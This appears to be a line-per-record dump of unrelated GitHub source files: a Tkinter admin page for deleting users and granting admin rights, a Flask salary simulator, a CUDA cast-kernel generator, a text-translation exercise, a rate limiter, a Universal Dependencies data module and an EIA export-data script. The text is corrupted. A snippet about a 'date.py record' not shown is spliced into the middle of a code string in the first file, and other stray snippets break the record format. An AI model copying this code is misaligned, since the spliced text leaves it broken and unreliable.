username, password):\r\n    def dest():\t\t\t # this function destroys the widgets on the page when the page is changed\r\n        self.userBanner.destroy()\r\n        self.filesBanner.destroy()\r\n        self.infoBanner.destroy()\r\n        self.spacer.destroy()\r\n        self.userScroll.destroy()\r\n        self.userBox.destroy()\r\n        self.fileScroll.destroy()\r\n        self.fileBox.destroy()\r\n        self.delUserBut.destroy()\r\n        self.delFileBut.destroy()\r\n        self.devUserBut.destroy()\r\n        self.DELUSER_ent.destroy()\r\n        self.DELFILE_ent.destroy()\r\n        self.DEVUSER_ent.destroy()\r\n        self.lab6.destroy()\r\n    def ret(event):\t # this function calls the dest function and then loads the main menu onto the page\r\n        dest()\r\n        from mainMENU import main_menu\r\n        main_menu(self, root, LoginFrame, username, password)\r\n    def DevopFunc(event):\r\n        try:\r\n            devUser = self.DEVUSER_ent.get()\r\n            path, pathx = os.getcwd().split(\"\\\\\"), \"\"      # these lines find the files opened and created later in the function\r\n            for i in path: pathx = pathx + i + \"\\\\\"\r\n            pathy = pathx + \"\\\\userInfo\\\\\" + devUser\r\n            pathz = pathy + (\"\\\\\" + devUser + \"Info.txt\")\r\n            file, lines = open(pathz, \"r\"), []\r\n            for line in file:      # these lines find the admin data in the user text file\r\n                if \"admin: \" in line: lines.append(\"admin: True\\n\")\r\n                else: lines.append(line)\r\n            file.close()\r\n            file = open(pathz, \"w\")      # these lines overwrite the file\r\n            for i in lines: file.write(i)\r\n            file.close()\r\n            tm.showinfo(\"Success\", \"the user was made a developer\")      # this shows a success message\r\n        except: tm.showerror(\"Error\", \"That user does not exist\")      # this error message is shown if the user does not exist\r\n\r\n    def DelUserFunc(event):\r\n        MsgBox = tm.askquestion('Delete Account','Are you sure you want to delete this user?',icon = 'warning')\r\n        if MsgBox == 'yes':\r\n            try:\r\n                delUser = self.DELUSER_ent.get()\r\n                if delUser == \"\": tm.showerror(\"Error\", \"That user does not exist\")\r\n                else:\r\n                    path, pathx, lines = os.getcwd().split(\"\\\\\"), \"\", []      # these lines find text files and put them in a string\r\n                    for i in path: pathx = pathx + i + \"\\\\\"\r\n                    pathy = pathx + 
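# --- A hedged sketch for exercise 3 in the date.py record above (the "Double Day").
# With ages measured in days, d - older == 2 * (d - younger) solves to
# d == 2 * younger - older on ordinal days; the birthdays below are illustrative.
from datetime import date

def double_day(b1: date, b2: date) -> date:
    older, younger = min(b1, b2), max(b1, b2)  # the earlier birthday belongs to the older person
    return date.fromordinal(2 * younger.toordinal() - older.toordinal())

print(double_day(date(1990, 1, 1), date(1995, 6, 15)))  # day when one age is exactly double the other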
\"\\\\GUIdata\\\\logins.txt\"\r\n pathx = pathx + \"\\\\userInfo\\\\\" + delUser\r\n shutil.rmtree(pathx)\r\n file, skip = open(pathy, \"r\"), False\r\n for line in file: # these lines find the login info\r\n if delUser in line and skip == False: skip = True\r\n elif skip == True: skip = False\r\n else: lines.append(line)\r\n file.close()\r\n file = open(pathy, \"w\")\r\n for x in lines: file.write(x) # this line re-writes the file, deleting the users info\r\n file.close()\r\n#-----------------------------------------------------------\r\n path.pop()\r\n patha = \"\"\r\n for i in path: patha = patha + i + \"\\\\\"\r\n pathb = patha + \"\\\\crypto_modules\\\\data\\\\queue.txt\"\r\n pathc = patha + \"\\\\crypto_modules\\\\data\\\\objects.txt\" # find the file paths\r\n rewrite, trigger = [], False\r\n file = open(pathb, \"w\") # clear the queue\r\n file.close()\r\n file = open(pathc, \"r\")\r\n for line in file: # remove users objects\r\n if trigger == False:\r\n if delUser in line: trigger = True\r\n else: rewrite.append(line)\r\n else: trigger = False\r\n file.close()\r\n file = open(pathc, \"w\")\r\n for line in rewrite:\r\n file.write(line)\r\n file.close()\r\n#-----------------------------------------------------------\r\n messagebox.showinfo(\"Success\", \"the user was deleted\")\r\n except: tm.showerror(\"Error\", \"That user does not exist\")\r\n\r\n def DelUserFile(event):\r\n fileToDel = self.DELFILE_ent.get()\r\n if fileToDel != \"\":\r\n path, pathx, found = os.getcwd().split(\"\\\\\"), \"\", False # these lines find the file and put the data into variable info\r\n directories, allUserFiles = [], \"\"\r\n for i in path: pathx = pathx + i + \"\\\\\"\r\n pathy = pathx + \"\\\\userInfo\"\r\n direcTwo = os.listdir(pathy)\r\n for i in direcTwo: directories.append(pathy + \"\\\\\" + i) # these lines find all the current user files\r\n for i in directories:\r\n currentDIR = os.listdir(i)\r\n for x in currentDIR:\r\n try:\r\n FTD = i + \"\\\\\" + fileToDel\r\n os.remove(FTD) # this line removes the file\r\n messagebox.showinfo(\"Success\", \"the file was deleted\") # this line shows the success message\r\n found = True\r\n except: expen = \"\" # this line is a filler\r\n if found == False: tm.showerror(\"Error\", \"That file does not exist\") # if the file is not found then this error message shows\r\n \r\n \r\n\r\n#===================================================================================================================\r\n path, pathx = os.getcwd().split(\"\\\\\"), \"\" # these lines find the file and put the data into variable info\r\n for i in path: pathx = pathx + i + \"\\\\\"\r\n pathy = pathx + \"\\\\GUIdata\\\\GUI_options.txt\" # these lines find the colour and font in the GUI_options file\r\n file = open(pathy, \"r\")\r\n for line in file:\r\n if \"background: \" in line: colour = line[12:-1]\r\n if \"font: \" in line: font = line[6:-1]\r\n file.close()\r\n#===================================================================================================================\r\n path, pathx, users = os.getcwd().split(\"\\\\\"), \"\", \"\" # these lines find the file and put the data into variable info\r\n for i in path: pathx = pathx + i + \"\\\\\"\r\n pathy = pathx + \"\\\\userInfo\" # these lines find the users in the directory\r\n direc = os.listdir(pathy)\r\n for file in direc: users = users + file + \"\\n\"\r\n \r\n#===================================================================================================================\r\n path, pathx = 
os.getcwd().split(\"\\\\\"), \"\" # these lines find the file and put the data into variable info\r\n directories, allUserFiles = [], \"\"\r\n for i in path: pathx = pathx + i + \"\\\\\"\r\n pathy = pathx + \"\\\\userInfo\"\r\n direcTwo = os.listdir(pathy)\r\n for i in direcTwo: directories.append(pathy + \"\\\\\" + i) # these lines find all the current user files\r\n for i in directories:\r\n currentDIR = os.listdir(i)\r\n for x in currentDIR:\r\n allUserFiles = allUserFiles + x + \"\\n\"\r\n#===================================================================================================================\r\n \r\n self.userBanner = Label(self, height=2, width=20, font=(\"Courier\", 15), text=\"all users\", bg=\"#add8e6\") # these lines are creating the 3 top banners\r\n self.filesBanner = Label(self, height=2, width=20, font=(\"Courier\", 15), text=\"user files\", bg=\"#add8e6\")\r\n self.infoBanner = Label(self, height=3, width=35, font=(\"Courier\", 10), text=\"welcome user, you have\\naccess to developer options\", bg=\"#add8e6\")\r\n self.spacer = Label(self, height=1, width=18, bg=colour)\r\n\r\n self.userScroll = Scrollbar(self)\t\t\t\t # these lines are for creating the all user box and user files box with scroll bars\r\n self.userBox = Text(self, yscrollcommand=self.userScroll.set, bg=\"#dee0e2\", font=(\"verdana\", 11), relief=\"sunken\")\r\n self.userBox.config(height=20, width=25)\r\n self.userScroll.config(command=self.userBox.yview)\r\n self.fileScroll = Scrollbar(self)\r\n self.fileBox = Text(self, yscrollcommand=self.fileScroll.set, bg=\"#dee0e2\", font=(\"verdana\", 11), relief=\"sunken\")\r\n self.fileBox.config(height=20, width=25)\r\n self.fileScroll.config(command=self.fileBox.yview)\r\n self.userBox.insert(\"1.0\", users)\r\n self.fileBox.insert(\"1.0\", allUserFiles)\r\n\r\n # these lines create the 3 buttons with user inputs\r\n self.delUserBut = Label(self, height=3, width=35, font=(\"Courier\", 10), text=\"delete a user\", bg=\"#add8e6\")\r\n self.delFileBut = Label(self, height=3, width=35, font=(\"Courier\", 10), text=\"delete a file\", bg=\"#add8e6\")\r\n self.devUserBut = Label(self, height=3, width=35, font=(\"Courier\", 10), text=\"devop a person\", bg=\"#add8e6\")\r\n self.DELUSER_ent = Entry(self, width=60)\r\n self.DELFILE_ent = Entry(self, width=60)\r\n self.DEVUSER_ent = Entry(self, width=60)\r\n\r\n self.spacer.grid(row=0, column=0)\t\t\t\t # these lines are griding the former created widgets and placing them on the screen\r\n self.userBanner.grid(row=0, column=1, padx=10, pady=10)\r\n self.filesBanner.grid(row=0, column=3, padx=10)\r\n self.infoBanner.grid(row=0, column=5, padx=10)\r\n self.userBox.grid(row=1, column=1, rowspan=7)\r\n self.userScroll.grid(row=1, column=2, ipady=150, rowspan=7)\r\n self.fileBox.grid(row=1, column=3, rowspan=7)\r\n self.fileScroll.grid(row=1, column=4, ipady=150, rowspan=7)\r\n self.delUserBut.grid(row=2, column=5)\r\n self.DELUSER_ent.grid(row=3, column=5, padx=10)\r\n self.delFileBut.grid(row=4, column=5)\r\n self.DELFILE_ent.grid(row=5, column=5)\r\n self.devUserBut.grid(row=6, column=5)\r\n self.DEVUSER_ent.grid(row=7, column=5)\r\n \r\n self.lab6 = Label(self, text=\"Return\", bg=\"#a3c7cc\", borderwidth=3, relief=\"groove\") # these lines are creating the return button and placing it\r\n self.lab6.config(font=(\"Courier\", 20), width=35, height=1)\r\n self.lab6.grid(row=8, column=1, columnspan=5, pady= 10)\r\n\r\n self.delFileBut.bind(\"\", DelUserFile)\r\n self.delUserBut.bind(\"\", DelUserFunc)\r\n 
self.devUserBut.bind(\"\", DevopFunc)\r\n self.lab6.bind(\"\", ret)\t\t\t\t\t\t\t\t# this is binding the return button to the function ret\r\n","repo_name":"Giles-Turnbull/cryptography-automation","sub_path":"cWORKcode/gui/code/developerPage.py","file_name":"developerPage.py","file_ext":"py","file_size_in_byte":11088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33234090522","text":"import os\nimport env_variables\nfrom flask import render_template, request, url_for, redirect\nfrom salary_simulation_API.models.addapters.adaptador_csv_aliquotas_cumulativas import Adaptador_CSV_Aliquotas_Cumulativas\nfrom salary_simulation_API.models.addapters.adaptador_csv_aliquotas_unicas import Adaptador_CSV_Aliquotas_Unicas\nfrom salary_simulation_API.models.impostos.irpf_clt import IRPF_CLT\nfrom salary_simulation_API.models.impostos.inss import INSS\nfrom salary_simulation_API.models.impostos.irpf_mei import IRPF_MEI\nfrom salary_simulation_API.models.impostos.simples_nacional import Simples_Nacional\nfrom salary_simulation_API.models.modelos.clt.beneficio import Beneficio\nfrom salary_simulation_API.models.modelos.clt.clt import CLT\nfrom salary_simulation_API.models.modelos.pj.mei import MEI\nfrom salary_simulation_API.models.pessoas.pessoa_fisica import Pessoa_Fisica\nfrom salary_simulation_API.models.pessoas.pessoa_juridica import Pessoa_Juridica\n\napp = env_variables.app\n\nadaptador_inss = Adaptador_CSV_Aliquotas_Cumulativas()\nadaptador_inss.set_informacoes(os.path.join(env_variables.DATA_PATH, 'tabela_INSS.csv'))\ninss = INSS(adaptador_inss)\n\nadaptador_ir = Adaptador_CSV_Aliquotas_Unicas()\nadaptador_ir.set_informacoes(os.path.join(env_variables.DATA_PATH, 'tabela_IR.csv'))\nirpf_clt = IRPF_CLT(adaptador_ir)\n\n\nadaptador_ir_mei = Adaptador_CSV_Aliquotas_Unicas()\nadaptador_ir_mei.set_informacoes(os.path.join(env_variables.DATA_PATH, 'tabela_IR.csv'))\nirpf_mei = IRPF_MEI(adaptador_ir)\n\nadaptador_sn = Adaptador_CSV_Aliquotas_Unicas()\nadaptador_sn.set_informacoes(os.path.join(env_variables.DATA_PATH, 'tabela_SimplesNacional.csv'))\nsn = Simples_Nacional(adaptador_sn, is_mei=True)\n\ndict_impostos_pf = {\n 'inss': inss,\n 'ir': irpf_clt\n}\n\ndict_impostos_pj = {\n 'simple_nacional': sn,\n 'ir': irpf_mei\n}\n\npf = None\npj = None\nmei = None\nclt = None\nbeneficios = []\n\n\n@app.route('/')\n@app.route('/home')\ndef home():\n global pf\n global pj\n global mei\n global clt\n global beneficios\n\n pf = None\n pj = None\n mei = None\n clt = None\n beneficios = []\n\n return render_template('home.html')\n\n\n@app.route('/cadastro', methods=['GET', 'POST'])\ndef cadastro_usuario():\n global pf\n global pj\n\n if request.method == 'GET':\n return render_template('forms/cadastro_form.html')\n else:\n nome = request.form['inputNome']\n id_number = request.form['inputId']\n qtd_dependentes = int(request.form['inputDependentes'])\n\n if request.form['inputModalidadeContrato'] == 'CLT':\n print('CLT')\n pf = Pessoa_Fisica(nome, id_number, qtd_dependentes)\n return redirect(url_for('simular_clt'))\n else:\n print('PJ')\n pj = Pessoa_Juridica(nome, id_number, qtd_dependentes)\n return redirect(url_for('simular_pj'))\n\n\n@app.route('/cadastro/CLT', methods=['GET', 'POST'])\ndef simular_clt():\n global pf\n global clt\n global beneficios\n global dict_impostos_pf\n\n if request.method == 'GET':\n if len(request.args) > 0:\n if all(value != '' for value in request.args.values()):\n nome = request.args['inputBeneficioNome']\n valor = 
request.args['inputBeneficioValor']\n                valor_descontar = request.args['inputBeneficioDesconto']\n                frequencia = request.args['inputBeneficioFrequencia']\n\n                beneficios.append(Beneficio(nome, valor, valor_descontar, frequencia))\n\n        return render_template('forms/clt_form.html', pessoa=pf, contrato=clt, beneficios=beneficios)\n    else:\n        salario_bruto = request.form['inputSalario']\n\n        clt = CLT(pf, salario_bruto, dict_impostos_pf, lista_beneficios=beneficios)\n        clt.calcular_imposto_total()\n        return render_template('forms/clt_form.html', pessoa=pf, contrato=clt, beneficios=beneficios)\n\n\n@app.route('/cadastro/PJ', methods=['GET', 'POST'])\ndef simular_pj():\n    global pj\n    global mei\n    global dict_impostos_pj\n\n    if request.method == 'GET':\n        return render_template('forms/pj_form.html', pessoa=pj, contrato=mei)\n    else:\n        salario_bruto = request.form['inputSalario']\n\n        mei = MEI(pj, salario_bruto, dict_impostos_pj, pj.qtd_dependentes)\n        mei.calcular_imposto_total()\n        return render_template('forms/pj_form.html', pessoa=pj, contrato=mei)\n\n\nif __name__ == '__main__':\n    app.run(host=\"0.0.0.0\", port=5000)\n","repo_name":"Diogo364/salary-simulation-API","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4443,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"19817594430","text":"from typing import Any, Dict\n\nimport jinja2\n\nfrom aitemplate.backend import registry\nfrom aitemplate.backend.backend_spec import CUDASpec\nfrom aitemplate.backend.common.elementwise_common import gen_int_var_product_str\n\nCUDA_HEADER_FILES = \"\"\"\n#include <cuda_fp16.h>\n#include <cuda_bf16.h>\n#include <cmath>\n\"\"\"\n\nCONSTANT_TEMPLATE = jinja2.Template(\n    \"\"\"\n#define N_THREADS_PER_BLOCK 256\n\n    \"\"\"\n)\n\nFUNC_DECL_TEMPLATE = jinja2.Template(\n    \"\"\"\nvoid invoke_{{func_name}}(\n    void* y,\n    const void* x,\n    {{index_type}} n_elements,\n    {{prefix}}Stream_t stream);\n    \"\"\"\n)\n\n\nFUNC_CALL_TEMPLATE = jinja2.Template(\n    \"\"\"\n{{indent}}{\n    {{indent}}const {{index_type}} {{func_name}}_n_elements = {{calculate_n}};\n    {{indent}}invoke_{{func_name}}({{output}}, {{input}}, {{func_name}}_n_elements, stream);\n{{indent}}}\n    \"\"\"\n)\n\n\nFUNC_TEMPLATE = jinja2.Template(\n    \"\"\"\n{{header_files}}\n\nnamespace {\n\n{{constant}}\n\n__global__ void cast_op(\n    {{output_type}}* output,\n    const {{input_type}}* input,\n    {{index_type}} n_elements\n) {\n    const {{index_type}} idx = (blockIdx.x * blockDim.x + threadIdx.x);\n    if (idx >= n_elements) {\n        return;\n    }\n    output[idx] = {{cast_func_call}}\n    }\n\n}  // namespace\n\nvoid invoke_{{func_name}}(void* output, const void* input,\n    {{index_type}} n_elements, {{prefix}}Stream_t stream) {\n    if (n_elements == 0) {\n        return;\n    }\n    int grid_size = static_cast<int>(std::ceil(static_cast<float>(n_elements) / N_THREADS_PER_BLOCK));\n    cast_op<<<grid_size, N_THREADS_PER_BLOCK, 0, stream>>>(\n        reinterpret_cast<{{output_type}}*>(output),\n        reinterpret_cast<const {{input_type}}*>(input),\n        n_elements\n    );\n}\n    \"\"\"\n)\n\nCAST_FUNCS = {\n    \"bool\": {\n        \"half\": \"(half)input[idx];\",\n        \"float\": \"(float)input[idx];\",\n        \"bfloat16\": \"(bfloat16)input[idx];\",\n    },\n    \"half\": {\n        \"bfloat16\": \"__float2bfloat16_rn(__half2float(input[idx]));\",\n        \"float\": \"__half2float(input[idx]);\",\n    },\n    \"bfloat16\": {\n        \"half\": \"__float2half_rn(__bfloat162float(input[idx]));\",\n        \"float\": \"__bfloat162float(input[idx]);\",\n    },\n    \"float\": {\n        \"bfloat16\": \"__float2bfloat16_rn(input[idx]);\",\n        \"half\": \"__float2half_rn(input[idx]);\",\n    },\n}\n\n\n@registry.reg(\"cuda.cast.gen_function\")\ndef 
gen_function(func_attrs: Dict[str, Any]) -> str:\n    input_ = func_attrs[\"inputs\"][0]\n    output = func_attrs[\"outputs\"][0]\n    backend_spec = CUDASpec()\n    output_dtype = output.dtype()\n    output_type = backend_spec.dtype_to_backend_type(output_dtype)\n    input_type = backend_spec.dtype_to_backend_type(input_.dtype())\n    cast_func_call = CAST_FUNCS[input_type][output_type]\n\n    return FUNC_TEMPLATE.render(\n        header_files=backend_spec.header_src_template.render(\n            extra_header=CUDA_HEADER_FILES\n        ),\n        constant=CONSTANT_TEMPLATE.render(),\n        func_name=func_attrs[\"name\"],\n        input_type=input_type,\n        output_type=output_type,\n        index_type=backend_spec.index_type,\n        cast_func_call=cast_func_call,\n        prefix=backend_spec.prefix,\n    )\n\n\n@registry.reg(\"cuda.cast.func_decl\")\ndef gen_function_decl(func_attrs: Dict[str, Any]) -> str:\n    backend_spec = CUDASpec()\n    return FUNC_DECL_TEMPLATE.render(\n        func_name=func_attrs[\"name\"],\n        prefix=backend_spec.prefix,\n        index_type=backend_spec.index_type,\n    )\n\n\n@registry.reg(\"cuda.cast.func_call\")\ndef gen_function_call(func_attrs: Dict[str, Any], indent=\"  \") -> str:\n    backend_spec = CUDASpec()\n    return FUNC_CALL_TEMPLATE.render(\n        func_name=func_attrs[\"name\"],\n        output=func_attrs[\"outputs\"][0]._attrs[\"name\"],\n        input=func_attrs[\"inputs\"][0]._attrs[\"name\"],\n        calculate_n=gen_int_var_product_str(func_attrs[\"inputs\"][0].shape()),\n        index_type=backend_spec.index_type,\n        indent=indent,\n    )\n","repo_name":"facebookincubator/AITemplate","sub_path":"python/aitemplate/backend/cuda/tensor/cast.py","file_name":"cast.py","file_ext":"py","file_size_in_byte":3889,"program_lang":"python","lang":"en","doc_type":"code","stars":4323,"dataset":"github-code","pt":"53"} +{"seq_id":"8835631874","text":"# 4. Create (not programmatically) a text file with the following contents:\n# One — 1\n# Two — 2\n# Three — 3\n# Four — 4\n# Write a program that opens the file for reading and reads the data line by line.\n# In doing so, the English numerals must be replaced with Russian ones.\n# The new block of lines must be written to a new text file.\n\ndictionary = {}\nwith open('dictionary.txt', \"r\", encoding='utf-8') as fdictionary:\n    for line in fdictionary:\n        dictionary[line.replace('\\n', '').split(\":\")[0]] = line.replace('\\n', '').split(\":\")[1]\n\ninput_file = open('text_4.txt', \"r\", encoding='utf-8')\noutput_file = open('task_04_output.txt', \"w\", encoding='utf-8')\n\nwhile True:\n    line = input_file.readline()\n    if line == '': break\n    translated_line = \"\"\n    i = 0\n\n    for word in line.replace('\\n', ' \\n').split(\" \"):\n        i += 1\n        try:\n            if word.istitle():\n                translated_word = dictionary[word.lower()].title()\n            else:\n                translated_word = dictionary[word.lower()]\n        except KeyError:\n            translated_word = word\n\n        translated_line = translated_line + translated_word\n\n        if i < len(line.replace('\\n', '').split(\" \")): translated_line = translated_line + \" \"\n\n    output_file.write(translated_line)\n\ninput_file.close()\noutput_file.close()\n","repo_name":"ahelmut/geekbrains_exercise","sub_path":"lesson05/task_04.py","file_name":"task_04.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35632543007","text":"import threading\n\nfrom Design_patterns.RateLimiter.slidingWindow.sliding_window import SlidingWindow\n\n\nclass UserBucketCreator:\n    def __init__(self, id):\n        self.bucket = {id: SlidingWindow(1, 10)}\n\n    def access_application(self, thread_id, id):\n        if 
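# --- Quick numeric check of the launch geometry in the cast.py record above:
# one thread per element, N_THREADS_PER_BLOCK threads per block.
import math

n_elements, threads_per_block = 1_000_000, 256
grid_size = math.ceil(n_elements / threads_per_block)  # 3907 blocks
assert grid_size * threads_per_block >= n_elements     # excess threads exit via the idx bound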
self.bucket.get(id).grant_access():\n print(f\"{thread_id} -> able to access the application\")\n else:\n print(f\"{thread_id} -> Too many requests, Please try after some time\")\n","repo_name":"jameeluddin/Low-level-Design","sub_path":"Design_patterns/RateLimiter/slidingWindow/user_bucket_creator.py","file_name":"user_bucket_creator.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35158134498","text":"import os\nfrom argparse import ArgumentParser\nfrom typing import Any, Callable, Dict, List, Tuple, Optional\nimport random\n\nfrom datasets import load_dataset, load_from_disk\nfrom torch import LongTensor\nfrom torch.utils.data import DataLoader\nfrom datasets.arrow_dataset import Dataset\nfrom transformers import BatchEncoding\n\nfrom infoshare.datamodules.base import BaseDataModule\n\n\nclass UDDataModule(BaseDataModule):\n @staticmethod\n def add_model_specific_args(parent_parser: ArgumentParser) -> ArgumentParser:\n parser = parent_parser.add_argument_group(\"Universal Dependencies\")\n parser.add_argument(\n \"--treebank_name\",\n type=str,\n default=\"en_gum\",\n help=\"The name of the treebank to use as the dataset.\",\n )\n parser.add_argument(\n \"--control_task\",\n default=False,\n action=\"store_true\",\n help=\"Flag to enable selectivity control task.\",\n )\n return parent_parser\n\n # Declare variables that will be initialized later\n ud_train: Dataset\n ud_val: Dataset\n ud_test: Dataset\n ud_debug: Dataset\n cname_to_id: Optional[Dict[str, int]]\n id_to_cname: List[str]\n num_classes: int\n\n def __init__(\n self,\n task: str,\n treebank_name: str,\n tokenize_fn: Callable,\n data_dir: str = \"./data\",\n batch_size: int = 64,\n num_workers: int = 4,\n control_task: bool = False,\n ):\n \"\"\"Data module for the Universal Dependencies framework.\n\n Args:\n task (str): the task to train the probing classifier on (either POS or DEP).\n treebank_name (str): the name of the treebank to use as the dataset\n tokenize_fn (Callable): a function that takes a sentence and returns a list of tokens\n data_dir: (str): the data directory to load/store the datasets\n batch_size (int): the batch size used by the dataloaders\n num_workers (int): the number of subprocesses used by the dataloaders\n control_task (bool): Whether to process the labels for the selectivity\n control task.\n \"\"\"\n super().__init__()\n self.save_hyperparameters(ignore=[\"tokenize_fn\"])\n\n valid_tasks = [\"POS\", \"DEP\"]\n assert task in valid_tasks, f\"Task must be one of {valid_tasks}.\"\n\n self.tokenize_fn = tokenize_fn\n self.dataset_dir = os.path.join(data_dir, treebank_name)\n\n if self.hparams.control_task:\n self.token_to_control_id = {}\n\n def prepare_data(self):\n if os.path.exists(self.dataset_dir):\n print(\"Dataset already downloaded.\")\n return\n\n print(\"Downloading UniversalDependencies data from HuggingFace\")\n dataset = load_dataset(\"universal_dependencies\", self.hparams.treebank_name)\n\n # Only keep columns that are relevant to our tasks\n keep_columns = [\"tokens\", \"upos\", \"head\", \"deprel\"]\n\n # Remove tokens that correspond to the underscore class.\n # The UniversalDependencies dataset essentially splits compound words into their parts\n # but keeps the original token in the list of tokens as well. 
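# --- A hedged usage sketch for the UserBucketCreator record above; per the import
# path, SlidingWindow(1, 10) is assumed to mean one request per 10-unit window.
bucket = UserBucketCreator("user-42")
bucket.access_application(thread_id=1, id="user-42")  # first call: access granted
bucket.access_application(thread_id=2, id="user-42")  # inside the window: rejected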
This will cause problems\n # when we try to parse the sentences, especially for dependency relations which is\n # affected by the word order as the \"head\" value is a token index.\n def remove_underscores(x: Dict[str, list]) -> Dict[str, list]:\n keep_indices = [\n idx for idx, value in enumerate(x[\"head\"]) if value != \"None\"\n ]\n for column in keep_columns:\n x[column] = [x[column][idx] for idx in keep_indices]\n\n return x\n\n drop_columns = set(dataset[\"train\"].column_names).difference(keep_columns)\n dataset = dataset.map(remove_underscores, remove_columns=list(drop_columns))\n\n # Handle the \"head\" features being a string instead of an int and some \"deprel\" features\n # having a language-specific relation modifier.\n def handle_dep_features(x: Dict[str, list]) -> Dict[str, list]:\n x[\"head\"] = [int(value) for value in x[\"head\"]]\n x[\"deprel\"] = [value.split(\":\")[0] for value in x[\"deprel\"]]\n return x\n\n dataset = dataset.map(handle_dep_features)\n\n print(\"Saving to disk\")\n dataset.save_to_disk(self.dataset_dir)\n\n def setup(self, stage: Optional[str] = None):\n dataset = load_from_disk(self.dataset_dir)\n\n if stage == \"fit\" or stage is None:\n self.ud_train = dataset[\"train\"]\n self.ud_val = dataset[\"validation\"]\n\n if self.hparams.task == \"POS\":\n self.id_to_cname = self.ud_train.info.features[\"upos\"].feature.names\n self.num_classes = self.ud_train.info.features[\n \"upos\"\n ].feature.num_classes\n self.cname_to_id = {k: i for i, k in enumerate(self.id_to_cname)}\n if self.hparams.control_task:\n random.seed(99)\n self.ud_train = self.ud_train.map(self._recompute_labels)\n self.ud_val = self.ud_val.map(self._recompute_labels)\n elif self.hparams.task == \"DEP\":\n # Aggregate all classes from the train dataset\n # We include \"_\" to comply with the number of classes in the dataset spec\n main_classes = sorted(set(\"_\").union(*self.ud_train[\"deprel\"]))\n # Create a mapping from class names to unique ids\n self.cname_to_id = {cname: i for i, cname in enumerate(main_classes)}\n\n self.id_to_cname = main_classes\n self.num_classes = len(main_classes)\n\n if stage == \"test\" or stage is None:\n self.ud_test = dataset[\"test\"]\n if self.hparams.control_task:\n # need training to determine the labels (if not already computed)\n self.ud_train = dataset[\"train\"]\n self.num_classes = self.ud_train.info.features[\n \"upos\"\n ].feature.num_classes\n random.seed(99)\n self.ud_train = self.ud_train.map(self._recompute_labels)\n self.ud_test = self.ud_test.map(self._recompute_labels)\n\n if stage == \"debug\" or stage is None:\n self.ud_debug = dataset[\"validation\"].select(list(range(50)))\n\n def _recompute_labels(self, sample: Dict) -> Dict:\n \"\"\"\n Recomputes the labels for the samples in the dataset based on the control task\n from Hewitt and Liang (2019).\n https://arxiv.org/abs/1909.03368\n\n We use a hardcoded seed of 99 for reproducibility.\n \"\"\"\n sample_labels = []\n for token in sample[\"tokens\"]:\n if token not in self.token_to_control_id:\n self.token_to_control_id[token] = random.randint(\n 0, self.num_classes - 1\n )\n sample_labels.append(self.token_to_control_id[token])\n sample[\"upos\"] = sample_labels\n return sample\n\n def get_collate_fn(self) -> Callable:\n \"\"\"Returns a collate function for the dataloader based on the task.\"\"\"\n if self.hparams.task == \"POS\":\n return self.pos_collate_fn\n elif self.hparams.task == \"DEP\":\n return self.dep_collate_fn\n # Add more cases here if needed\n\n def 
map_drels_to_ids(self, drels: List[str]) -> LongTensor:\n \"\"\"Maps a list of dependency relations to unique ids.\"\"\"\n return LongTensor([self.cname_to_id[drel] for drel in drels])\n\n def pos_collate_fn(\n self, batch: List[Dict[str, Any]]\n ) -> Tuple[BatchEncoding, List[LongTensor]]:\n \"\"\"Custom collate function for the POS task.\"\"\"\n encodings = self.tokenize_fn([x[\"tokens\"] for x in batch])\n targets = [LongTensor(x[\"upos\"]) for x in batch]\n return encodings, targets\n\n def dep_collate_fn(\n self, batch: List[Dict[str, Any]]\n ) -> Tuple[BatchEncoding, List[LongTensor], List[LongTensor]]:\n \"\"\"Custom collate function for the DEP task.\"\"\"\n encodings = self.tokenize_fn([x[\"tokens\"] for x in batch])\n heads = [LongTensor(x[\"head\"]) for x in batch]\n targets = [self.map_drels_to_ids(x[\"deprel\"]) for x in batch]\n return encodings, heads, targets\n\n def train_dataloader(self) -> DataLoader:\n return DataLoader(\n self.ud_train,\n batch_size=self.hparams.batch_size,\n num_workers=self.hparams.num_workers,\n collate_fn=self.get_collate_fn(),\n shuffle=True,\n drop_last=True,\n )\n\n def val_dataloader(self) -> DataLoader:\n return DataLoader(\n self.ud_val,\n batch_size=self.hparams.batch_size,\n num_workers=self.hparams.num_workers,\n collate_fn=self.get_collate_fn(),\n )\n\n def test_dataloader(self) -> DataLoader:\n return DataLoader(\n self.ud_test,\n batch_size=self.hparams.batch_size,\n num_workers=self.hparams.num_workers,\n collate_fn=self.get_collate_fn(),\n )\n\n def debug_dataloader(self) -> DataLoader:\n return DataLoader(\n self.ud_debug,\n batch_size=self.hparams.batch_size,\n num_workers=self.hparams.num_workers,\n collate_fn=self.get_collate_fn(),\n )\n","repo_name":"thesofakillers/infoshare","sub_path":"infoshare/datamodules/ud.py","file_name":"ud.py","file_ext":"py","file_size_in_byte":9467,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"42577937332","text":"import requests\nimport api_key\nimport pandas as pd\nkey = api_key.key # API KEY for EIA data https://www.eia.gov/opendata/register.php\n\n\n\nbase_url = 'http://api.eia.gov/category/?api_key='\nurl = base_url + key + '&category_id=321205'\n#get list of all countries\nserial_data = requests.get(url=url).json()\n\n\nlist_df = []\nlist_metadata = []\nbase_url = 'http://api.eia.gov/series/?api_key='\n# Extract export data for each country\nfor i in serial_data['category']['childseries']:\n if i['series_id'][-1] == 'M' and i['units'] == 'Thousand Barrels':\n url = base_url + key + '&series_id=' + i['series_id']\n x = requests.get(url=url).json()\n df = pd.DataFrame(x['series'][0]['data'],columns=['MonthYear','Thousand Barrels'])\n df['country'] = x['series'][0]['description']\n list_df.append(df)\n x['series'][0].pop('data')\n list_metadata.append(x['series'][0])\n\ndf_data = pd.concat(list_df)\ndf = pd.DataFrame(list_metadata)\ndf_2 = df.merge(df_data,how='inner',left_on='description',right_on='country')[['MonthYear','units','Thousand Barrels','iso3166']]\ndf_2 = df_2[df_2['iso3166'] != 'USA']\ndf_meta = pd.DataFrame(requests.get(url='https://opendata.socrata.com/resource/mnkm-8ram.json').json())\ndf_4 = 